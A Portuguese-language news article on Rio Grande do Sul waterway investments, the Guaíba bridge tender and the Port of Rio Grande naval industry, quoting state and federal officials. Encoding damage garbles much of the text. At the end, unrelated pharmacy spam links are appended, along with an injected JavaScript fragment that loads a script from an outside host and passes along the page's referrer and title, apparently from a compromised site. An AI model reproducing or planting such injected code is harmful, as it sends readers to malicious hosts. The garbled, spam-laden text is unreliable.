SecretA?rio apresenta investimentos em hidrovias e destaca a importA?ncia da indA?stria naval no RS
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Durante o painel, o secretA?rio afirmou que um dos principais gargalos para o desenvolvimento da Metade Sul, Ai?? a ponte do GuaAi??ba, A?nica via de acesso para o escoamento da produAi??A?o atAi?? o Porto de Rio Grande. Nesse sentido, Beto lembrou que na A?ltima segunda-feira (19) foi publicado no DiA?rio Oficial da UniA?o o edital para a licitaAi??A?o da nova ponte do GuaAi??ba. ai???Esta Ai?? uma grande notAi??cia, pois esta nova alternativa viA?ria dialogarA?, evidentemente, com a navegaAi??A?o e o Porto de Rio Grandeai???.
O secretA?rio destacou, ainda, o trabalho que vem sendo realizado pela Secretaria Especial de Portos (SEP), como as obras nos Molhes da Barra, dragagem, e revitalizaAi??A?o de 1.125 metros do Cais do Porto Novo. ai??? Esta foi uma decisA?o polAi??tica do ex-presidente Lula que apostou na revitalizaAi??A?o da indA?stria naval e teve continuidade no governo Dilma. Agora, precisamos de uma polAi??tica que estimule o mundo empresarial e traga condiAi??Ai??es competitivas para as hidrovias gaA?chasai???, disse Beto, ao lembrar que os governos estadual e federal firmaram um acordo de gestA?o compartilhada para o setor no RS. ai???SerA?o investidos R$ 116 milhAi??es nos prA?ximos dois anos em balizamento noturno e recuperaAi??A?o do nosso parque de mA?quinasai???, garantiu ele. O prA?ximo passo, de acordo com Albuquerque, Ai?? lanAi??ar o Procedimento de ManifestaAi??A?o de Interesse (PMI) para que os investidores apresentem propostas para a revitalizaAi??A?o das hidrovias gaA?chas.
Ao final, o secretA?rio relatou que estA? em andamento um estudo de viabilidade da travessia a seco entre Rio Grande e SA?o JosAi?? do norte, que poderA? ser por meio de ponte ou tunel.
JA? o ministro dos Transportes, Paulo Passos, disse que os portos brasileiros sA?o A?reas de convergA?ncia, mas que essa dimensA?o em Rio Grande significa uma economia ai???pulsante e efervecenteai???.ai???Hoje hA? um redesenho do complexo portuA?rio e as expectativas sA?o notA?veis nA?o sA? no volume de cargas, mas tambAi??m no impulso de outras economias, como as indA?strias de celulose e navalai???. Ele enumerou alguns projetos da UniA?o em hidrovias, expansA?o de ferrovias, e a revitalizaAi??A?o da indA?stria naval de Rio Grande, por meio de projetos para cinco estaleiros, alAi??m de investimento na ordem de R$ 2,4 bilhAi??es para a ampliaAi??A?o e construAi??A?o de plantas.ai???Percebemos a vocaAi??A?o de Rio Grande como polo na A?rea naval, com oportunidades que visam a competitividade e ampliam a oferta de mercadoai???, afirmou.
TambAi??m participaram do debate o ministro de Portos, LeA?nidas Cristino, o presidente da CA?mara de PolAi??ticas de GestA?o, Desempenho e Competitividade do Conselho de Governo, Jorge Gerdau Johannpetter, o secretA?rio executivo da SEP, MA?rio Lima, o superintendente de Portos e Hidrovias do RS, Pedro Olbelar e o superintendente do Porto de Rio Grande, Dirceu Lopes. Pills over the counter equivalent to metformin http://acashop.top/2018/03/19/buy-zoloft-malaysia/ dulcolax price at cvs s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;